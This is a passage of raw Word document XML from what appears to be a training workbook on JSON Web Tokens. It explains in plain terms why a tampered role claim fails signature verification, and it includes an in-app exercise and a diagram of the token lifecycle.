        </w:rPr>
        <w:t xml:space="preserve">What Happens When Someone Tries to Tamper?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Imagine an attacker has your token. They change </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">"role": "user"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">"role": "admin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the payload. They send the modified token to the server. Here is what happens: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0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">😈  Attacker modifies the payload</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Changes role from "user" to "admin" in the payload. Re-encodes the payload in Base64URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">📤  Attacker sends the modified token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sends: [original header].[modified payload].[original signature]. The signature still matches the ORIGINAL payload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🔍  Server receives the token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server splits the token and takes the header and modified payload. It re-calculates the signature using its secret key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">💥  Signature mismatch!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The re-calculated signature is completely different from the one in the token. They do not match.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🚫  401 Unauthorized</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server rejects the request. The attacker gets nothing. The tamper was detected.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B75" w:sz="4"/>
              <w:left w:val="single" w:color="006B75" w:sz="24"/>
              <w:bottom w:val="single" w:color="006B75" w:sz="4"/>
              <w:right w:val="single" w:color="006B75" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E0F4F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006B75"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✏️  THINK ABOUT IT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">Why can the attacker not just re-calculate a new valid signature after changing the payload?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Think about what ingredient is needed to create the signature...</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Answer:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A6E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT Lifecycle &amp; Real API Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">The JWT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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Module 08 in the app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click  ▶ Start Timer  — watch the countdown and the lifecycle stages move.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Watch how the colour changes from green → yellow → red as the token nears expiry.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">When the timer hits zero — notice what the lifecycle stage becomes.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875A" w:sz="8"/>
              <w:left w:val="single" w:color="00875A" w:sz="8"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="8"/>
              <w:right w:val="single" w:color="00875A" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="08111E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="320"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="320"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  🔑 LOGIN          🏭 TOKEN CREATED     📡 IN USE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  User logs in  →  JWT generated     →  Client sends JWT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                   signed &amp; sent         with every request</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                              │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                         ⏰ NEAR EXPIRY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                         JWT almost expired</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                              │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                         💀 EXPIRED</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                         Server rejects token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                              │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                         🔄 LOGIN AGAIN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                         Or use refresh token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
